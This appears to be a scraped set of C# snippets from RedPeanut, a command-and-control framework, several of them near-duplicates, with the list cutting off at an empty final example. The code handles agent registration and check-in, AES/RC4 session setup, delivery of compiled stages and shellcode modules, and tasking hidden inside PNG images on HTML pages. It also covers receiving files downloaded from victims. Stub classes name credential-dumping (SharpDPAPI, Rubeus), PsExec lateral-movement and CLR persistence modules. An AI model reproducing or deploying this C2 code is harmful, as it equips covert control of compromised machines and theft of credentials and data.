Exemple #1
        //Send agentid
        //RC4 with serverkey
        /// <summary>
        /// Builds the reply to an agent-id request. The reply is a JSON <c>AgentIdMsg</c> that carries
        /// the agent id, the key and IV of the agent's <c>AesManaged</c> instance, and a stage built from
        /// the agent template, then passed through <c>EncryptMessage</c> with <paramref name="serverkey"/>.
        /// </summary>
        /// <param name="agent">Agent the message is built for; cast to <c>AgentInstanceHttp</c> below.</param>
        /// <param name="serverkey">Key handed to <c>EncryptMessage</c> for the outgoing message.</param>
        /// <param name="profileid">Profile to look up; an unknown id yields an empty result.</param>
        /// <param name="targetframework">Forwarded to the template replacer and to the builder.</param>
        /// <returns>The encrypted message, or an empty string when <paramref name="profileid"/> is not registered.</returns>
        private string CreateMsgAgentId(IAgentInstance agent, string serverkey, int profileid, int targetframework)
        {
            string mesg        = "";
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
            {
                // NOTE(review): the AES session key and IV are placed in the message body, so their
                // confidentiality depends entirely on EncryptMessage and the server key. The comment
                // above this method says RC4; if so, the message has no integrity protection - confirm.
                AesManaged aes = agent.AesManager;
                AgentIdMsg msg = new AgentIdMsg
                {
                    agentid    = agent.AgentId,
                    sessionkey = aes.Key,
                    sessioniv  = aes.IV
                };

                HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);

                // The casts are unchecked: any other IAgentInstance implementation throws InvalidCastException here.
                ListenerConfig conf   = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), profile, profileid);
                string         source = System.IO.File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
                // NOTE(review): the template is filled with RedPeanut.Program.GetServerKey(), not with the
                // serverkey parameter used for encryption below - confirm the two are always the same value.
                source    = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                // Stage = Base64( CompressGZipAssembly( assembly built from the filled template ) ).
                msg.stage = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", targetframework, compprofile: CompilationProfile.Agent)));

                string agentidnmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
                mesg = EncryptMessage(serverkey, agentidnmsg);
            }
            return(mesg);
        }
Exemple #2
        /// <summary>
        /// Dispatches a POST request by session state: no "sessionid" cookie goes to <c>StepOne</c>,
        /// a cookie naming a registered agent goes to <c>PostResponse</c>, and a cookie naming an
        /// inbound agent goes to <c>CheckIn</c>. Anything else is answered with 404.
        /// </summary>
        /// <returns>The result of the selected handler, or <c>NotFound()</c> on an unknown id or any exception.</returns>
        public ActionResult <string> Post()
        {
            // Step 1: the request carries no session cookie yet.
            if (string.IsNullOrEmpty(GetCookieValue("sessionid")))
            {
                return StepOne(new StreamReader(Request.Body, System.Text.Encoding.UTF8));
            }

            // A cookie is present. Per the original notes it must be RC4-encrypted with the server key,
            // no other check is made on it, and the body must be encrypted with the session key/IV pair.
            try
            {
                string agentId = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));

                // Registered agent: the body is handled as a task response.
                if (RedPeanutC2.server.GetAgents().ContainsKey(agentId))
                {
                    StreamReader responseBody = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
                    IAgentInstance active = RedPeanutC2.server.GetAgents().GetValueOrDefault(agentId);
                    return PostResponse(responseBody, active);
                }

                // Agent still in the inbound queue: the body is handled as an AES check-in.
                if (RedPeanutC2.server.GetInboundAgents().ContainsKey(agentId))
                {
                    StreamReader checkinBody = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
                    IAgentInstance inbound = RedPeanutC2.server.GetInboundAgents().GetValueOrDefault(agentId);
                    return CheckIn(checkinBody, inbound);
                }

                // Unknown id: corrupted session or a request that is not legitimate.
                Console.WriteLine("[x] Agent does not exeists corrupted session or request not legitimate");
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }
            catch (Exception e)
            {
                // Any failure (decryption included) is reported on the console and answered with 404.
                Console.WriteLine("[x] Operation error {0}", e.Message);
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }
        }
        /// <summary>
        /// Builds the acknowledgement body: the literal "Ok" passed through <c>EncryptAesMessage</c>
        /// with the agent's AES manager, then Base64-encoded.
        /// </summary>
        /// <param name="agent">Agent whose <c>AesManager</c> is used.</param>
        /// <returns>The Base64 text of the encrypted acknowledgement.</returns>
        private string CreateOkMgs(IAgentInstance agent)
        {
            AesManaged sessionAes = agent.AesManager;
            return Convert.ToBase64String(EncryptAesMessage("Ok", sessionAes));
        }
Exemple #4
 /// <summary>
 /// Creates an HTTP agent instance from the supplied identifiers and gives it a fresh
 /// <c>AesManaged</c> instance.
 /// </summary>
 /// <param name="server">Owning server, stored as-is.</param>
 /// <param name="agentid">Identifier of this agent.</param>
 /// <param name="serverkey">Server key, stored as-is.</param>
 /// <param name="targetframework">Target framework value, stored as-is.</param>
 /// <param name="agent">Agent stored in the <c>pivoter</c> field.</param>
 /// <param name="profileid">Profile id, stored as-is.</param>
 public AgentInstanceHttp(C2Server server, string agentid, string serverkey, int targetframework, IAgentInstance agent, int profileid)
 {
     // Values copied straight from the arguments.
     this.server = server;
     this.agentid = agentid;
     this.serverkey = serverkey;
     this.profileid = profileid;
     this.targetframwork = targetframework;
     this.pivoter = agent;

     // New AES object for this instance; its key and IV are whatever AesManaged generates by default.
     this.aes = new AesManaged();
 }
        /// <summary>
        /// Creates an <c>AgentInstanceHttp</c> and, when a pivot agent id is given, sets its
        /// <c>Pivoter</c> to the agent that <c>RedPeanutC2.server.GetAgent</c> returns for that id.
        /// </summary>
        /// <param name="agentPivotid">Id of the pivoting agent; null or empty means no pivot.</param>
        /// <param name="sessionkey">Optional session key forwarded to the constructor.</param>
        /// <param name="sessioniv">Optional session IV forwarded to the constructor.</param>
        /// <returns>The newly created agent instance.</returns>
        private IAgentInstance CreateAgentInstance(C2Server server, string agentid, string agentPivotid, string serverkey,
                                                   string address, int port, int framework, int profileid, byte[] sessionkey = null, byte[] sessioniv = null)
        {
            IAgentInstance created = new AgentInstanceHttp(server, agentid, serverkey, address, port, framework, profileid, sessionkey, sessioniv);

            if (string.IsNullOrEmpty(agentPivotid))
            {
                return created;
            }

            // The request came through a pivoting agent, so record it.
            // NOTE(review): the lookup result is not checked here; whether GetAgent can return null is not visible.
            created.Pivoter = RedPeanutC2.server.GetAgent(agentPivotid);
            return created;
        }
Exemple #6
 /// <summary>
 /// Prints a one-row table describing a checked-in agent, then reprints the current menu prompt.
 /// The whole output is written while holding <c>_printlocker</c>.
 /// </summary>
 /// <param name="agent">Agent whose id and <c>SysInfo</c> fields are printed.</param>
 public void PrintAgentCheckedIn(IAgentInstance agent)
 {
     string rule = new string('-', 144);
     const string rowFormat = "[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |";

     lock (_printlocker)
     {
         // NOTE(review): the SysInfo values are supplied by the agent and are printed unfiltered.
         var info = agent.SysInfo;

         Console.WriteLine("\n[*] Agent " + agent.AgentId + " checkedin");
         Console.WriteLine("[*]  {0}", rule);
         Console.WriteLine(rowFormat, "Agent", "IP", "Integrity", "User", "Process", "System");
         Console.WriteLine("[*]  {0}", rule);
         Console.WriteLine(rowFormat, agent.AgentId, info.Ip, info.Integrity, info.User, info.ProcessName, info.Os);
         Console.WriteLine("[*]  {0}", rule);
         Program.GetMenuStack().Peek().RePrintCLI();
     }
 }
        /// <summary>
        /// Creates an HTTP agent instance, gives it a fresh <c>AesManaged</c> instance, copies
        /// <c>InjectionManaged</c> from the profile identified by <paramref name="profileid"/>, and
        /// stamps <c>lastseen</c> with the current local time.
        /// </summary>
        /// <param name="agent">Agent stored in the <c>pivoter</c> field.</param>
        /// <param name="profileid">Profile id; also used to look the profile up on the server.</param>
        public AgentInstanceHttp(C2Server server, string agentid, string serverkey, int targetframework, IAgentInstance agent, int profileid)
        {
            // Values copied straight from the arguments.
            this.server = server;
            this.agentid = agentid;
            this.serverkey = serverkey;
            this.profileid = profileid;
            this.targetframwork = targetframework;
            this.pivoter = agent;

            // New AES object for this instance.
            this.aes = new AesManaged();

            // NOTE(review): no null check on the profile; an unknown id presumably fails on the next line.
            HttpProfile httpProfile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);
            Managed = httpProfile.InjectionManaged;

            // DateTime.Now is local time, so lastseen shifts with the host's time zone and DST.
            lastseen = DateTime.Now;
        }
Exemple #8
 /// <summary>
 /// Writes the coloured prompt "[RP] &lt;agent id&gt; > " to the console and leaves the foreground
 /// colour set to gray.
 /// </summary>
 /// <param name="agent">Agent whose id appears in the prompt.</param>
 public static void PrintCLI(IAgentInstance agent)
 {
     // Writes one prompt segment in the given colour.
     void Segment(ConsoleColor colour, string text)
     {
         Console.ForegroundColor = colour;
         Console.Write(text);
     }

     Segment(ConsoleColor.White, "[");
     Segment(ConsoleColor.Red, "RP");
     Segment(ConsoleColor.White, "]");

     Console.ForegroundColor = ConsoleColor.Gray;
     Console.Write(" {0} ", agent.AgentId);

     Segment(ConsoleColor.White, "> ");

     // Colour used for whatever is typed after the prompt.
     Console.ForegroundColor = ConsoleColor.Gray;
 }
        /// <summary>
        /// Serialises <paramref name="task"/> to JSON, encrypts it with the agent's AES manager and
        /// Base64-encodes it. When the profile has <c>HtmlCovered</c> set, the encoded task is handed to
        /// <c>ImageGenerator.Create</c> together with a cover image, the output file is registered as a
        /// web resource, and an HTML page produced from the template is returned instead of the raw text.
        /// </summary>
        /// <param name="agent">Agent whose <c>AesManager</c> encrypts the task.</param>
        /// <param name="task">Task to deliver.</param>
        /// <returns>
        /// The HTML page (covered profile), the Base64 ciphertext (plain profile), or an empty string
        /// when the HTML template contains no "targetclass" marker.
        /// </returns>
        private string CreateTaskMgs(IAgentInstance agent, TaskMsg task)
        {
            AesManaged  aes     = agent.AesManager;
            HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid);

            string mesg;

            if (profile.HtmlCovered)
            {
                string folderrpath       = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER);
                string htmlsource        = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE));

                // Number of "targetclass" occurrences in the template (split parts minus one).
                int elements = htmlsource.Split("targetclass").Length - 1;
                if (elements <= 0)
                {
                    return("");
                }

                string[] images       = ListImages();
                Random   random       = new Random();
                // Random.Next's upper bound is exclusive: the result is in [1, elements - 1],
                // or exactly 1 when elements == 1.
                int      payloadindex = random.Next(1, elements);

                //Create Image with task embedded
                string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
                taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes));
                string outputfilename = RandomAString(10, random) + ".png";
                string outfullpath    = Path.Combine(outputfolderrpath, outputfilename);
                // NOTE(review): assumes ListImages() returned at least payloadindex entries; otherwise
                // this index throws - confirm against ListImages.
                string imagepath      = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]);
                // NOTE(review): Encoding.Default differs between runtimes; the payload is Base64 (ASCII),
                // so the bytes are presumably the same either way - confirm.
                ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath);

                //Add Image to resources
                // NOTE(review): a new .png is written and registered on every call; nothing here removes
                // old files or resources.
                C2Manager c2manager = Program.GetC2Manager();
                c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename));

                //Create html page
                htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images);

                return(htmlsource);
            }
            else
            {
                // Plain profile: the response body is the Base64 ciphertext itself.
                string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
                mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes));
                return(mesg);
            }
        }
        /// <summary>
        /// Handles the check-in POST of an inbound agent: parses and decrypts the body, stores the
        /// reported system information on the agent, prints it, moves the agent from the inbound
        /// queue to the registered set and answers with the encrypted "Ok".
        /// </summary>
        /// <param name="reader">Reader over the request body.</param>
        /// <param name="agent">Inbound agent the request was matched to.</param>
        /// <returns><c>Ok</c> with the acknowledgement, or <c>NotFound()</c> on any failure.</returns>
        private ActionResult CheckIn(StreamReader reader, IAgentInstance agent)
        {
            try
            {
                string body = reader.ReadToEnd();
                Dictionary <string, string> fields = GetParsedArgs(body);
                CheckInMsg checkin = GetCheckInMsg(fields.GetValueOrDefault(Paramname), agent);

                try
                {
                    agent.SysInfo = checkin.systeminfo;

                    string rule = new string('-', 144);
                    const string rowFormat = "[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |";

                    // The SysInfo values come from the agent and are printed unfiltered.
                    Console.WriteLine("\n[*] Agent " + agent.AgentId + " checkedin");
                    Console.WriteLine("[*]  {0}", rule);
                    Console.WriteLine(rowFormat, "Agent", "IP", "Integrity", "User", "Process", "System");
                    Console.WriteLine("[*]  {0}", rule);
                    Console.WriteLine(rowFormat, agent.AgentId, agent.SysInfo.Ip, agent.SysInfo.Integrity, agent.SysInfo.User, agent.SysInfo.ProcessName, agent.SysInfo.Os);
                    Console.WriteLine("[*]  {0}", rule);
                    Program.GetMenuStack().Peek().RePrintCLI();

                    try
                    {
                        RedPeanutC2.server.RemoveAgentInbound(agent.AgentId);
                    }
                    catch (Exception)
                    {
                        // Deliberately ignored: a failed removal does not stop the registration below.
                    }

                    RedPeanutC2.server.RegisterAgent(agent.AgentId, agent);
                    return Ok(CreateOkMgs(agent));
                }
                catch (Exception checkinError)
                {
                    Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId);
                    Console.WriteLine("[x] {0}", checkinError.Message);
                    Program.GetMenuStack().Peek().RePrintCLI();
                    httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                    return NotFound();
                }
            }
            catch (Exception parseError)
            {
                // Decrypting or deserialising the message failed; the prompt is not reprinted on this path.
                Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2");
                Console.WriteLine("[x] {0}", parseError.StackTrace);
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }
        }
Exemple #11
        /// <summary>
        /// Handles the first POST of a new agent (no session cookie): decrypts the agent-id request
        /// with the server key, creates an inbound agent with a random 10-character id, sets the
        /// "sessionid" cookie to the encrypted id and returns the agent-id message.
        /// </summary>
        /// <param name="reader">Reader over the request body.</param>
        /// <returns><c>Ok</c> with the agent-id message, or <c>NotFound()</c> on any failure.</returns>
        private ActionResult StepOne(StreamReader reader)
        {
            AgentIdReqMsg request = null;

            // Phase 1: parse, decrypt and deserialise the request.
            try
            {
                string rawBody = reader.ReadToEnd();
                Dictionary <string, string> fields = GetParsedArgs(rawBody);
                var json = DecryptMessage(RedPeanutC2.server.GetServerKey(), fields.GetValueOrDefault(Paramname));
                request = JsonConvert.DeserializeObject <AgentIdReqMsg>(json);
            }
            catch (Exception)
            {
                // Decryption or deserialisation failed: answer 404 and close the connection.
                Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }

            // Phase 2: create the inbound agent and build the reply.
            try
            {
                IAgentInstance created = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), request.address, request.port, request.framework, Profileid);

                // The request came through a pivoting agent, so record it.
                if (!string.IsNullOrEmpty(request.AgentPivot))
                {
                    created.Pivoter = RedPeanutC2.server.GetAgent(request.AgentPivot);
                }

                RedPeanutC2.server.RegisterAgentInbound(created.AgentId, created);
                string reply = CreateMsgAgentId(created, RedPeanutC2.server.GetServerKey(), Profileid, request.framework);

                // The session cookie is the agent id passed through EncryptMessage with the server key.
                SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), created.AgentId), 0);
                Console.WriteLine("\n[*] Agent {0} connected", created.AgentId);
                Program.GetMenuStack().Peek().RePrintCLI();
                return Ok(reply);
            }
            catch (Exception e)
            {
                // Operation error
                Console.WriteLine("[x] Operation error {0}", e.Message);
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }
        }
Exemple #12
        /// <summary>
        /// Shows the agent prompt, reads one line and offers it to <c>StandardCommand</c>.
        /// </summary>
        /// <param name="agent">Agent the prompt and the command are bound to.</param>
        /// <returns>
        /// An empty string when the standard command handled the input; otherwise the line as typed,
        /// which is also added to the history when it is not blank.
        /// </returns>
        public static string RedPeanutCLI(IAgentInstance agent)
        {
            PrintCLI(agent);
            string typed = ReadLine.Read();
            StandardCommand standard = new StandardCommand(agent);

            // Handled input is consumed here and never reaches the history.
            if (standard.Execute(typed))
            {
                return "";
            }

            if (typed.Trim().Length > 0)
            {
                ReadLine.AddHistory(typed);
            }

            return typed;
        }
        /// <summary>
        /// Decodes a Base64 check-in body, decrypts it with the agent's AES manager and deserialises
        /// it into a <c>CheckInMsg</c>.
        /// </summary>
        /// <param name="input">Base64 text; a null or malformed value makes <c>Convert.FromBase64String</c> throw.</param>
        /// <param name="agent">Agent whose <c>AesManager</c> decrypts the body.</param>
        /// <returns>
        /// The deserialised message. When deserialisation throws, the error is printed and an empty
        /// <c>CheckInMsg</c> is returned; decoding and decryption errors propagate to the caller.
        /// </returns>
        private Models.CheckInMsg GetCheckInMsg(string input, IAgentInstance agent)
        {
            byte[] cipher = Convert.FromBase64String(input);

            // A check-in message is expected here.
            string json = DecryptAesMessage(cipher, agent.AesManager);

            CheckInMsg parsed = new CheckInMsg();
            try
            {
                parsed = JsonConvert.DeserializeObject <CheckInMsg>(json);
            }
            catch (Exception e)
            {
                // Only deserialisation failures are absorbed; the caller gets the empty message.
                Console.WriteLine("Error: " + e.Message);
            }

            return parsed;
        }
Exemple #14
        /// <summary>
        /// Handles the check-in POST of an inbound agent: parses and decrypts the body, stores the
        /// reported system information, moves the agent from the inbound queue to the registered
        /// set, prints the check-in table and answers with the encrypted "Ok".
        /// </summary>
        /// <param name="reader">Reader over the request body.</param>
        /// <param name="agent">Inbound agent the request was matched to.</param>
        /// <returns><c>Ok</c> with the acknowledgement, or <c>NotFound()</c> on any failure.</returns>
        private ActionResult CheckIn(StreamReader reader, IAgentInstance agent)
        {
            // Registration step; its own failures are reported with the agent id.
            ActionResult Register(CheckInMsg checkin)
            {
                try
                {
                    agent.SysInfo = checkin.systeminfo;

                    try
                    {
                        RedPeanutC2.server.RemoveAgentInbound(agent.AgentId);
                    }
                    catch (Exception)
                    {
                        // Deliberately ignored: a failed removal does not stop the registration below.
                    }

                    // NOTE(review): the agent is registered before the table is printed, so a failure
                    // while printing returns 404 for an agent that is already registered.
                    RedPeanutC2.server.RegisterAgent(agent.AgentId, agent);
                    RedPeanutC2.server.PrintAgentCheckedIn(agent);

                    return Ok(CreateOkMgs(agent));
                }
                catch (Exception e)
                {
                    Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId);
                    Console.WriteLine("[x] {0}", e.Message);
                    Program.GetMenuStack().Peek().RePrintCLI();
                    httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                    return NotFound();
                }
            }

            try
            {
                Dictionary <string, string> fields = GetParsedArgs(reader.ReadToEnd());
                CheckInMsg message = GetCheckInMsg(fields.GetValueOrDefault(Paramname), agent);
                return Register(message);
            }
            catch (Exception e)
            {
                // Decrypting or deserialising the message failed; the prompt is not reprinted on this path.
                Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2");
                Console.WriteLine("[x] {0}", e.StackTrace);
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }
        }
Exemple #15
 /// <summary>
 /// Appends <paramref name="task"/> to a command queue, creating the queue on first use.
 /// The queue is keyed by the pivoter's id when the agent has one, otherwise by the agent's own id.
 /// </summary>
 /// <param name="agent">Agent the task is meant for.</param>
 /// <param name="task">Task to enqueue.</param>
 public void AddCommand(IAgentInstance agent, TaskMsg task)
 {
     // A pivoted agent is reached through its pivoter, so the task goes into the pivoter's queue.
     var queueKey = agent.Pivoter != null ? agent.Pivoter.AgentId : agent.AgentId;

     if (!commandqueue.ContainsKey(queueKey))
     {
         commandqueue.Add(queueKey, new List <TaskMsg>());
     }

     // NOTE(review): no lock is visible here; whether commandqueue is touched from several threads
     // cannot be told from this block.
     commandqueue.GetValueOrDefault(queueKey).Add(task);
 }
        /// <summary>
        /// Decodes a Base64 response body, decrypts it with the agent's AES manager, deserialises it
        /// into a <c>ResponseMsg</c> and copies its <c>SystemInfo</c> onto the agent.
        /// </summary>
        /// <param name="input">Base64 text; a null or malformed value makes <c>Convert.FromBase64String</c> throw.</param>
        /// <param name="agent">Agent whose <c>AesManager</c> decrypts the body; cast to <c>AgentInstanceHttp</c>.</param>
        /// <returns>
        /// The deserialised message. Failures inside the try block are printed and absorbed, so the
        /// result can be an empty <c>ResponseMsg</c>, or null when the deserialiser returned null.
        /// </returns>
        private Models.ResponseMsg GetResponseMsg(string input, IAgentInstance agent)
        {
            byte[] cipher = Convert.FromBase64String(input);

            // A task response is expected here.
            string json = DecryptAesMessage(cipher, agent.AesManager);

            ResponseMsg parsed = new Models.ResponseMsg();
            try
            {
                parsed = JsonConvert.DeserializeObject <ResponseMsg>(json);

                // Every response refreshes the system information stored for the agent.
                AgentInstanceHttp httpAgent = (AgentInstanceHttp)agent;
                httpAgent.SysInfo = parsed.SystemInfo;
            }
            catch (Exception e)
            {
                Console.WriteLine("Error: " + e.Message);
            }

            return parsed;
        }
Exemple #17
 /// <summary>
 /// Polling endpoint: resolves the agent from the "sessionid" cookie, updates its
 /// <c>lastseen</c> time and, when a command is queued, returns it as a task message and
 /// removes it from the queue.
 /// </summary>
 /// <returns>
 /// <c>Ok</c> with the task message, an empty <c>Ok</c> when nothing is queued, or
 /// <c>NotFound()</c> for an unknown agent or any exception.
 /// </returns>
 public ActionResult <string> Get()
 {
     // Original note: authentication still needs to be checked here. The only check made is that
     // the cookie decrypts to a known agent id.
     try
     {
         string agentId = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));

         IAgentInstance agent = RedPeanutC2.server.GetAgent(agentId);
         if (agent == null)
         {
             return NotFound();
         }

         agent.lastseen = DateTime.Now;

         TaskMsg pending = RedPeanutC2.server.GetCommand(agent);
         if (pending == null)
         {
             return Ok();
         }

         string response = CreateTaskMgs(agent, pending);
         RedPeanutC2.server.RemoveCommand(agent, pending);
         Console.WriteLine("\n[*] Agent {0} tasked to run command...", agent.AgentId);
         Program.GetMenuStack().Peek().RePrintCLI();
         return Ok(response);
     }
     catch (HttpOperationException)
     {
         return NotFound();
     }
     catch (Exception)
     {
         // Every failure, a cookie that does not decrypt included, is answered with a bare 404.
         return NotFound();
     }
 }
Exemple #18
        /// <summary>
        /// Handles a task response posted by a registered agent. A response to a "download" task is
        /// decoded, decompressed and written under the downloads folder; any other response is
        /// printed to the console. Both paths answer with the encrypted "Ok".
        /// </summary>
        /// <param name="reader">Reader over the request body.</param>
        /// <param name="agent">Registered agent the request was matched to.</param>
        /// <returns><c>Ok</c> with the acknowledgement, or <c>NotFound()</c> on any failure.</returns>
        private ActionResult PostResponse(StreamReader reader, IAgentInstance agent)
        {
            try
            {
                Dictionary <string, string> fields = GetParsedArgs(reader.ReadToEnd());
                ResponseMsg response = GetResponseMsg(fields.GetValueOrDefault(Paramname), agent);

                // The task is looked up by the instance id that the agent sent back.
                TaskMsg task = RedPeanutC2.server.GetTaskResponse(response.TaskInstanceid);

                Console.WriteLine("\n[*] Received response from agent {0}....", agent.AgentId);

                if (task.TaskType.Equals("download"))
                {
                    byte[] content = Utility.DecompressDLL(Convert.FromBase64String(response.Data));

                    // NOTE(review): FileNameDest is concatenated into the path as-is. If it can contain
                    // directory separators or "..", the write can land outside the downloads folder;
                    // Path.GetFileName would pin it - confirm where FileNameDest is set.
                    // NOTE(review): the decompressed size is not bounded here.
                    string target = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, DOWNLOADS_FOLDER, "downloaded_item_" + task.DownloadTask.FileNameDest);
                    System.IO.File.WriteAllBytes(target, content);
                    Console.WriteLine("[*] File {0} downloaded", target);
                }
                else
                {
                    // NOTE(review): agent-supplied text goes to the operator's terminal unfiltered,
                    // control characters included.
                    Console.WriteLine(response.Data);
                }

                Program.GetMenuStack().Peek().RePrintCLI();
                return Ok(CreateOkMgs(agent));
            }
            catch (Exception e)
            {
                // Decrypting, deserialising or handling the message failed.
                Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return {0}", e.Message);
                Console.WriteLine("[x] {0}", e.StackTrace);
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return NotFound();
            }
        }
 /// <summary>
 /// Polling endpoint: resolves the agent from the "sessionid" cookie and, when a command is
 /// queued, returns it as a task message and removes it from the queue.
 /// </summary>
 /// <returns>
 /// <c>Ok</c> with the task message, an empty <c>Ok</c> when nothing is queued, or
 /// <c>NotFound()</c> for an unknown agent or any exception.
 /// </returns>
 public ActionResult <string> Get()
 {
     // Original note: authentication still needs to be checked here. The only check made is that
     // the cookie decrypts to a known agent id.
     try
     {
         string agentId = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));

         IAgentInstance agent = RedPeanutC2.server.GetAgent(agentId);
         if (agent == null)
         {
             return NotFound();
         }

         TaskMsg pending = RedPeanutC2.server.GetCommand(agent);
         if (pending == null)
         {
             Console.WriteLine("No command");
             return Ok();
         }

         string response = CreateTaskMgs(agent, pending);
         RedPeanutC2.server.RemoveCommand(agent, pending);
         return Ok(response);
     }
     catch (HttpOperationException)
     {
         return NotFound();
     }
     catch (Exception)
     {
         // Every failure, a cookie that does not decrypt included, is answered with a bare 404.
         return NotFound();
     }
 }
Exemple #20
        /// <summary>
        /// Builds a "module" task from an embedded resource and sends it to <paramref name="agent"/>.
        /// Does nothing when <paramref name="agent"/> is null.
        /// </summary>
        /// <param name="resname">Resource name passed to <c>ReadResourceFile</c>.</param>
        /// <param name="type">Module class name placed in the task.</param>
        /// <param name="args">Parameters placed in the task.</param>
        /// <param name="agent">Target agent; its <c>Managed</c> flag selects the payload form.</param>
        public static void RunAssembly(string resname, string type, string[] args, IAgentInstance agent)
        {
            if (agent != null)
            {
                ModuleConfig modconfig = new ModuleConfig
                {
                    // Overwritten by both branches below, so this read of the resource is redundant.
                    Assembly    = ReadResourceFile(resname),
                    Method      = "Execute",
                    Moduleclass = type,
                    Parameters  = args
                };

                if (agent.Managed)
                {
                    // Managed agents receive the resource content as read.
                    modconfig.Assembly = ReadResourceFile(resname);
                }
                else
                {
                    // Otherwise the resource goes through Builder.GenerateShellcode, and the result is
                    // GZip-compressed and Base64-encoded.
                    modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
                                                                                         ReadResourceFile(resname), RandomAString(10, new Random()) + ".exe", type, "Execute", args)));
                }

                // NOTE(review): Instanceid comes from a fresh System.Random, which is not a
                // cryptographic generator; the id later selects the task a response is matched to.
                TaskMsg task = new TaskMsg
                {
                    TaskType   = "module",
                    Instanceid = RandomAString(10, new Random()),
                    ModuleTask = modconfig,
                    Agentid    = agent.AgentId
                };

                // Record the pivoter's id on the task when the agent has one.
                if (agent.Pivoter != null)
                {
                    task.AgentPivot = agent.Pivoter.AgentId;
                }
                agent.SendCommand(task);
            }
        }
Exemple #21
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public SharpDPAPICredentialsManager(IAgentInstance agent) => this.agent = agent;
Exemple #22
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public SharpPsExecManager(IAgentInstance agent) => this.agent = agent;
Exemple #23
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public SpawnAsAgentManager(IAgentInstance agent) => this.agent = agent;
Exemple #24
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public RubeusASREPRoastManager(IAgentInstance agent) => this.agent = agent;
Exemple #25
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public PersCLRManager(IAgentInstance agent) => this.agent = agent;
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public SharpDPAPIMasterKeysManager(IAgentInstance agent) => this.agent = agent;
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
 public RubeusDumpManager(IAgentInstance agent) => this.agent = agent;
Exemple #28
 /// <summary>Creates the manager and stores the agent instance it operates on.</summary>
 /// <param name="agent">Agent instance kept in the <c>agent</c> field.</param>
